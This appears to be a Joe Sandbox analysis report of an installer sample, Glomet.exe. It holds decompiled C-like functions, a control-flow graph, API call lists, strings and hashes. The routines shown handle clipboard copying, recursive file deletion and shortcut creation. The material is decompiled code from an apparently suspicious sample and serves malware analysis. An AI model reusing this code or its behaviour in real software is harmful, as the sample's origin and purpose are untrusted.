                                                                                                                                                                              							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                                                                                                                                              							__eflags = _t90 - _t150;
                                                                                                                                                                              							_a12 = _t90;
                                                                                                                                                                              							if(_t90 <= _t150) {
                                                                                                                                                                              								L36:
                                                                                                                                                                              								return 0;
                                                                                                                                                                              							}
                                                                                                                                                                              							_t163 = CreatePopupMenu();
                                                                                                                                                                              							AppendMenuA(_t163, _t150, 1, E004062EA(_t150, _t157, _t163, _t150, 0xffffffe1));
                                                                                                                                                                              							_t95 = _a16;
                                                                                                                                                                              							__eflags = _a16 - 0xffffffff;
                                                                                                                                                                              							_t153 = _a16 >> 0x10;
                                                                                                                                                                              							if(_a16 == 0xffffffff) {
                                                                                                                                                                              								GetWindowRect(_v8,  &_v24);
                                                                                                                                                                              								_t95 = _v24.left;
                                                                                                                                                                              								_t153 = _v24.top;
                                                                                                                                                                              							}
                                                                                                                                                                              							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                                                                                                                                                                              							__eflags = _t96 - 1;
                                                                                                                                                                              							if(_t96 == 1) {
                                                                                                                                                                              								_t165 = 1;
                                                                                                                                                                              								__eflags = 1;
                                                                                                                                                                              								_v56 = _t150;
                                                                                                                                                                              								_v44 = 0x42a890;
                                                                                                                                                                              								_v40 = 0x1000;
                                                                                                                                                                              								_a4 = _a12;
                                                                                                                                                                              								do {
                                                                                                                                                                              									_a4 = _a4 - 1;
                                                                                                                                                                              									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                                                                                                                                                              									__eflags = _a4 - _t150;
                                                                                                                                                                              									_t165 = _t165 + _t99 + 2;
                                                                                                                                                                              								} while (_a4 != _t150);
                                                                                                                                                                              								OpenClipboard(_t150);
                                                                                                                                                                              								EmptyClipboard();
                                                                                                                                                                              								_t102 = GlobalAlloc(0x42, _t165);
                                                                                                                                                                              								_a4 = _t102;
                                                                                                                                                                              								_t166 = GlobalLock(_t102);
                                                                                                                                                                              								do {
                                                                                                                                                                              									_v44 = _t166;
                                                                                                                                                                              									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                                                                                                                                              									 *_t167 = 0xd;
                                                                                                                                                                              									_t168 = _t167 + 1;
                                                                                                                                                                              									 *_t168 = 0xa;
                                                                                                                                                                              									_t166 = _t168 + 1;
                                                                                                                                                                              									_t150 = _t150 + 1;
                                                                                                                                                                              									__eflags = _t150 - _a12;
                                                                                                                                                                              								} while (_t150 < _a12);
                                                                                                                                                                              								GlobalUnlock(_a4);
                                                                                                                                                                              								SetClipboardData(1, _a4);
                                                                                                                                                                              								CloseClipboard();
                                                                                                                                                                              							}
                                                                                                                                                                              							goto L36;
                                                                                                                                                                              						}
                                                                                                                                                                              						__eflags =  *0x42ebec - _t150; // 0x0
                                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                                              							ShowWindow( *0x42f428, 8);
                                                                                                                                                                              							__eflags =  *0x42f4ac - _t150;
                                                                                                                                                                              							if( *0x42f4ac == _t150) {
                                                                                                                                                                              								_t113 =  *0x42a068; // 0x59dddc
                                                                                                                                                                              								E00405378( *((intOrPtr*)(_t113 + 0x34)), _t150);
                                                                                                                                                                              							}
                                                                                                                                                                              							E004042AD(1);
                                                                                                                                                                              							goto L25;
                                                                                                                                                                              						}
                                                                                                                                                                              						 *0x429c60 = 2;
                                                                                                                                                                              						E004042AD(0x78);
                                                                                                                                                                              						goto L20;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						__eflags = _a12 - 0x403;
                                                                                                                                                                              						if(_a12 != 0x403) {
                                                                                                                                                                              							L20:
                                                                                                                                                                              							return E0040433B(_t157, _a12, _a16);
                                                                                                                                                                              						}
                                                                                                                                                                              						ShowWindow( *0x42ebf0, _t150);
                                                                                                                                                                              						ShowWindow(_v8, 8);
                                                                                                                                                                              						E00404309(_v8);
                                                                                                                                                                              						goto L17;
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				_v48 = _v48 | 0xffffffff;
                                                                                                                                                                              				_v36 = _v36 | 0xffffffff;
                                                                                                                                                                              				_t169 = 2;
                                                                                                                                                                              				_v56 = _t169;
                                                                                                                                                                              				_v52 = 0;
                                                                                                                                                                              				_v44 = 0;
                                                                                                                                                                              				_v40 = 0;
                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                              				_t124 =  *0x42f430;
                                                                                                                                                                              				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                                                                                                                                              				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                                                                                                                                              				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
                                                                                                                                                                              				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
                                                                                                                                                                              				_t128 = GetDlgItem(_a4, 0x3f8);
                                                                                                                                                                              				 *0x42ec04 = _t128;
                                                                                                                                                                              				_v8 = _t128;
                                                                                                                                                                              				E00404309( *0x42ebf0);
                                                                                                                                                                              				 *0x42ebf4 = E00404BFA(4);
                                                                                                                                                                              				 *0x42ec0c = 0;
                                                                                                                                                                              				GetClientRect(_v8,  &_v24);
                                                                                                                                                                              				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                                                                                                                                              				SendMessageA(_v8, 0x101b, 0,  &_v56); // executed
                                                                                                                                                                              				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                                                                                                                                              				if(_a12 >= 0) {
                                                                                                                                                                              					SendMessageA(_v8, 0x1001, 0, _a12);
                                                                                                                                                                              					SendMessageA(_v8, 0x1026, 0, _a12);
                                                                                                                                                                              				}
                                                                                                                                                                              				if(_a8 >= _t150) {
                                                                                                                                                                              					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                                                                                                                                              				}
                                                                                                                                                                              				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                                                                              				_push(0x1b);
                                                                                                                                                                              				E004042D4(_a4);
                                                                                                                                                                              				if(( *0x42f438 & 0x00000003) != 0) {
                                                                                                                                                                              					ShowWindow( *0x42ebf0, _t150);
                                                                                                                                                                              					if(( *0x42f438 & 0x00000002) != 0) {
                                                                                                                                                                              						 *0x42ebf0 = _t150;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						ShowWindow(_v8, 8);
                                                                                                                                                                              					}
                                                                                                                                                                              					E00404309( *0x42ebe8);
                                                                                                                                                                              				}
                                                                                                                                                                              				_t161 = GetDlgItem(_a4, 0x3ec);
                                                                                                                                                                              				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                                                                                                                                              				if(( *0x42f438 & 0x00000004) != 0) {
                                                                                                                                                                              					SendMessageA(_t161, 0x409, _t150, _a8);
                                                                                                                                                                              					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                                                                                                                                              				}
                                                                                                                                                                              				goto L36;
                                                                                                                                                                              			}


                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00405515
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00405524
                                                                                                                                                                              • GetClientRect.USER32 ref: 00405561
                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 00405568
                                                                                                                                                                              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405589
                                                                                                                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040559A
                                                                                                                                                                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 004055AD
                                                                                                                                                                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 004055BB
                                                                                                                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 004055CE
                                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055F0
                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405604
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00405625
                                                                                                                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405635
                                                                                                                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040564E
                                                                                                                                                                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040565A
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00405533
                                                                                                                                                                                • Part of subcall function 00404309: SendMessageA.USER32(00000028,?,00000001,00404139), ref: 00404317
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00405676
                                                                                                                                                                              • CreateThread.KERNELBASE ref: 00405684
                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040568B
                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004056AE
                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004056B5
                                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 004056FB
                                                                                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040572F
                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00405740
                                                                                                                                                                              • AppendMenuA.USER32 ref: 00405755
                                                                                                                                                                              • GetWindowRect.USER32 ref: 00405775
                                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578E
                                                                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057CA
                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 004057DA
                                                                                                                                                                              • EmptyClipboard.USER32 ref: 004057E0
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,?), ref: 004057E9
                                                                                                                                                                              • GlobalLock.KERNEL32 ref: 004057F3
                                                                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405807
                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405820
                                                                                                                                                                              • SetClipboardData.USER32(00000001,00000000), ref: 0040582B
                                                                                                                                                                              • CloseClipboard.USER32 ref: 00405831
                                                                                                                                                                              Strings
                                                                                                                                                                              • ARBEJDSTILLADELSER Setup: Installing, xrefs: 004057A6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                                                                                                              • String ID: ARBEJDSTILLADELSER Setup: Installing
                                                                                                                                                                              • API String ID: 4154960007-1892138075
                                                                                                                                                                              • Opcode ID: 9f894bfef72f42a5d80c28a2cfb4653c4d0ae1818b29ab90f23da2409dea8f81
                                                                                                                                                                              • Instruction ID: 345e578925e8e8fc579d0e732d58a8f557a0115a7d420367cc7026d592e1690f
                                                                                                                                                                              • Opcode Fuzzy Hash: 9f894bfef72f42a5d80c28a2cfb4653c4d0ae1818b29ab90f23da2409dea8f81
                                                                                                                                                                              • Instruction Fuzzy Hash: D6A189B1900608BFDB11AF61DD89EAE7B79FB08354F40403AFA45B61A0CB758E51DF68
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 505 405a19-405a3f call 405cd7 508 405a41-405a53 DeleteFileA 505->508 509 405a58-405a5f 505->509 510 405be2-405be6 508->510 511 405a61-405a63 509->511 512 405a72-405a82 call 406257 509->512 514 405b90-405b95 511->514 515 405a69-405a6c 511->515 518 405a91-405a92 call 405c30 512->518 519 405a84-405a8f lstrcatA 512->519 514->510 517 405b97-405b9a 514->517 515->512 515->514 520 405ba4-405bac call 4065ce 517->520 521 405b9c-405ba2 517->521 522 405a97-405a9a 518->522 519->522 520->510 528 405bae-405bc2 call 405be9 call 4059d1 520->528 521->510 525 405aa5-405aab lstrcatA 522->525 526 405a9c-405aa3 522->526 529 405ab0-405ace lstrlenA FindFirstFileA 525->529 526->525 526->529 543 405bc4-405bc7 528->543 544 405bda-405bdd call 405378 528->544 531 405ad4-405aeb call 405c14 529->531 532 405b86-405b8a 529->532 539 405af6-405af9 531->539 540 405aed-405af1 531->540 532->514 534 405b8c 532->534 534->514 541 405afb-405b00 539->541 542 405b0c-405b1a call 406257 539->542 540->539 545 405af3 540->545 546 405b02-405b04 541->546 547 405b65-405b77 FindNextFileA 541->547 555 405b31-405b3c call 4059d1 542->555 556 405b1c-405b24 542->556 543->521 549 405bc9-405bd8 call 405378 call 406030 543->549 544->510 545->539 546->542 551 405b06-405b0a 546->551 547->531 553 405b7d-405b80 FindClose 547->553 549->510 551->542 551->547 553->532 565 405b5d-405b60 call 405378 555->565 566 405b3e-405b41 555->566 556->547 558 405b26-405b2f call 405a19 556->558 558->547 565->547 568 405b43-405b53 call 405378 call 406030 566->568 569 405b55-405b5b 566->569 568->547 569->547
                                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                                              			E00405A19(void* __eflags, signed int _a4, signed int _a8) {
                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                              				void* _v12;
                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                              				struct _WIN32_FIND_DATAA _v336;
                                                                                                                                                                              				signed int _t40;
                                                                                                                                                                              				char* _t53;
                                                                                                                                                                              				signed int _t55;
                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                              				signed int _t64;
                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                              				void* _t68;
                                                                                                                                                                              				signed char _t69;
                                                                                                                                                                              				CHAR* _t71;
                                                                                                                                                                              				void* _t72;
                                                                                                                                                                              				CHAR* _t73;
                                                                                                                                                                              				char* _t76;
                                                                                                                                                                              
                                                                                                                                                                              				_t69 = _a8;
                                                                                                                                                                              				_t73 = _a4;
                                                                                                                                                                              				_v8 = _t69 & 0x00000004;
                                                                                                                                                                              				_t40 = E00405CD7(__eflags, _t73);
                                                                                                                                                                              				_v16 = _t40;
                                                                                                                                                                              				if((_t69 & 0x00000008) != 0) {
                                                                                                                                                                              					_t66 = DeleteFileA(_t73); // executed
                                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                                              					_t68 =  ~_t66 + 1;
                                                                                                                                                                              					 *0x42f4a8 =  *0x42f4a8 + _t68;
                                                                                                                                                                              					return _t68;
                                                                                                                                                                              				}
                                                                                                                                                                              				_a4 = _t69;
                                                                                                                                                                              				_t8 =  &_a4;
                                                                                                                                                                              				 *_t8 = _a4 & 0x00000001;
                                                                                                                                                                              				__eflags =  *_t8;
                                                                                                                                                                              				if( *_t8 == 0) {
                                                                                                                                                                              					L5:
                                                                                                                                                                              					E00406257(0x42b898, _t73);
                                                                                                                                                                              					__eflags = _a4;
                                                                                                                                                                              					if(_a4 == 0) {
                                                                                                                                                                              						E00405C30(_t73);
                                                                                                                                                                              					} else {
                                                                                                                                                                              						lstrcatA(0x42b898, "\*.*");
                                                                                                                                                                              					}
                                                                                                                                                                              					__eflags =  *_t73;
                                                                                                                                                                              					if( *_t73 != 0) {
                                                                                                                                                                              						L10:
                                                                                                                                                                              						lstrcatA(_t73, 0x40a014);
                                                                                                                                                                              						L11:
                                                                                                                                                                              						_t71 =  &(_t73[lstrlenA(_t73)]);
                                                                                                                                                                              						_t40 = FindFirstFileA(0x42b898,  &_v336);
                                                                                                                                                                              						__eflags = _t40 - 0xffffffff;
                                                                                                                                                                              						_v12 = _t40;
                                                                                                                                                                              						if(_t40 == 0xffffffff) {
                                                                                                                                                                              							L29:
                                                                                                                                                                              							__eflags = _a4;
                                                                                                                                                                              							if(_a4 != 0) {
                                                                                                                                                                              								_t32 = _t71 - 1;
                                                                                                                                                                              								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                                                                                                                                              								__eflags =  *_t32;
                                                                                                                                                                              							}
                                                                                                                                                                              							goto L31;
                                                                                                                                                                              						} else {
                                                                                                                                                                              							goto L12;
                                                                                                                                                                              						}
                                                                                                                                                                              						do {
                                                                                                                                                                              							L12:
                                                                                                                                                                              							_t76 =  &(_v336.cFileName);
                                                                                                                                                                              							_t53 = E00405C14( &(_v336.cFileName), 0x3f);
                                                                                                                                                                              							__eflags =  *_t53;
                                                                                                                                                                              							if( *_t53 != 0) {
                                                                                                                                                                              								__eflags = _v336.cAlternateFileName;
                                                                                                                                                                              								if(_v336.cAlternateFileName != 0) {
                                                                                                                                                                              									_t76 =  &(_v336.cAlternateFileName);
                                                                                                                                                                              								}
                                                                                                                                                                              							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00406257(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059D1(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00405378(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4a8 =  *0x42f4a8 + 1;
										} else {
											E00405378(0xfffffff1, _t73);
											E00406030(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A19(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b898 - 0x5c;
					if( *0x42b898 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E004065CE(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BE9(_t73);
							_t40 = E004059D1(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00405378(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00405378(0xfffffff1, _t73);
							return E00406030(_t72, _t73, 0);
						}
						L33:
						 *0x42f4a8 =  *0x42f4a8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405b65
                                                                                                                                                                              0x00405b6f
                                                                                                                                                                              0x00405b75
                                                                                                                                                                              0x00405b75
                                                                                                                                                                              0x00405b80
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405b80
                                                                                                                                                                              0x00405a9c
                                                                                                                                                                              0x00405aa3
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405a61
                                                                                                                                                                              0x00405a61
                                                                                                                                                                              0x00405a63
                                                                                                                                                                              0x00405b90
                                                                                                                                                                              0x00405b92
                                                                                                                                                                              0x00405b95
                                                                                                                                                                              0x00405be6
                                                                                                                                                                              0x00405be6
                                                                                                                                                                              0x00405be6
                                                                                                                                                                              0x00405b97
                                                                                                                                                                              0x00405b9a
                                                                                                                                                                              0x00405ba5
                                                                                                                                                                              0x00405baa
                                                                                                                                                                              0x00405bac
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405baf
                                                                                                                                                                              0x00405bbb
                                                                                                                                                                              0x00405bc0
                                                                                                                                                                              0x00405bc2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405bdd
                                                                                                                                                                              0x00405bc4
                                                                                                                                                                              0x00405bc7
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405bcc
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405bd3
                                                                                                                                                                              0x00405b9c
                                                                                                                                                                              0x00405b9c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405b9c
                                                                                                                                                                              0x00405a69
                                                                                                                                                                              0x00405a6c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405a6c

                                                                                                                                                                              APIs
                                                                                                                                                                              • DeleteFileA.KERNELBASE(?,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ), ref: 00405A42
                                                                                                                                                                              • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ), ref: 00405A8A
                                                                                                                                                                              • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ), ref: 00405AAB
                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ), ref: 00405AB1
                                                                                                                                                                              • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ), ref: 00405AC2
                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6F
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405B80
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                              • String ID: "C:\programdata\Glomet.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                              • API String ID: 2035342205-4178602851
                                                                                                                                                                              • Opcode ID: 6279d5409f9ac8fecf523039a44e07b92db75dbea9c2d76fe17a079ddec69c30
                                                                                                                                                                              • Instruction ID: 3775624a82358ee84ae0e61ef35c65b769ecc780556a32b7edc65eda158531b4
                                                                                                                                                                              • Opcode Fuzzy Hash: 6279d5409f9ac8fecf523039a44e07b92db75dbea9c2d76fe17a079ddec69c30
                                                                                                                                                                              • Instruction Fuzzy Hash: D351BD30904A08AADB22AB618C89FAF7B78DF42714F24417BF441752D2D77C6982DE6D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                                              			E00402173() {
                                                                                                                                                                              				signed int _t55;
                                                                                                                                                                              				void* _t59;
                                                                                                                                                                              				intOrPtr* _t63;
                                                                                                                                                                              				intOrPtr _t64;
                                                                                                                                                                              				intOrPtr* _t65;
                                                                                                                                                                              				intOrPtr* _t67;
                                                                                                                                                                              				intOrPtr* _t69;
                                                                                                                                                                              				intOrPtr* _t71;
                                                                                                                                                                              				intOrPtr* _t73;
                                                                                                                                                                              				intOrPtr* _t75;
                                                                                                                                                                              				intOrPtr* _t78;
                                                                                                                                                                              				intOrPtr* _t80;
                                                                                                                                                                              				intOrPtr* _t82;
                                                                                                                                                                              				intOrPtr* _t84;
                                                                                                                                                                              				int _t87;
                                                                                                                                                                              				intOrPtr* _t95;
                                                                                                                                                                              				signed int _t105;
                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                              				void* _t111;
                                                                                                                                                                              
                                                                                                                                                                              				 *(_t111 - 0x38) = E00402C39(0xfffffff0);
                                                                                                                                                                              				 *(_t111 - 0xc) = E00402C39(0xffffffdf);
                                                                                                                                                                              				 *((intOrPtr*)(_t111 - 0x88)) = E00402C39(2);
                                                                                                                                                                              				 *((intOrPtr*)(_t111 - 0x34)) = E00402C39(0xffffffcd);
                                                                                                                                                                              				 *((intOrPtr*)(_t111 - 0x78)) = E00402C39(0x45);
                                                                                                                                                                              				_t55 =  *(_t111 - 0x18);
                                                                                                                                                                              				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                                                                                                                                                                              				_t105 = _t55 & 0x00008000;
                                                                                                                                                                              				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                                                                                                                                              				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                              				if(E00405C56( *(_t111 - 0xc)) == 0) {
                                                                                                                                                                              					E00402C39(0x21);
                                                                                                                                                                              				}
                                                                                                                                                                              				_t59 = _t111 + 8;
                                                                                                                                                                              				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59); // executed
                                                                                                                                                                              				if(_t59 < _t87) {
                                                                                                                                                                              					L15:
                                                                                                                                                                              					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                                                                                                                                              					_push(0xfffffff0);
                                                                                                                                                                              				} else {
                                                                                                                                                                              					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                              					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
                                                                                                                                                                              					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                                                                                                                                              					if(_t64 >= _t87) {
                                                                                                                                                                              						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                              						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                                                                                                                                              						if(_t105 == _t87) {
                                                                                                                                                                              							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                              							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens\\Lektionskatalogets1");
                                                                                                                                                                              						}
                                                                                                                                                                              						if(_t109 != _t87) {
                                                                                                                                                                              							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                              							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                                                                                                                                              						}
                                                                                                                                                                              						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                              						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                                                                                                                                                                              						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                                                                                                                                                                              						if( *_t95 != _t87) {
                                                                                                                                                                              							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                              							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                                                                                                                                                                              						}
                                                                                                                                                                              						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                              						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                                                                                                                                                                              						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                              						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                                                                                                                                                                              						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                                                                                                              							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                                                                                                                                              							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                                                                                                                                                              								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                                                                                                                                              								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                                                                                                                                              						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                                                                                                                                              					}
                                                                                                                                                                              					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                              					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                                                              					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                                                                                                              						_push(0xfffffff4);
                                                                                                                                                                              					} else {
                                                                                                                                                                              						goto L15;
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				E00401423();
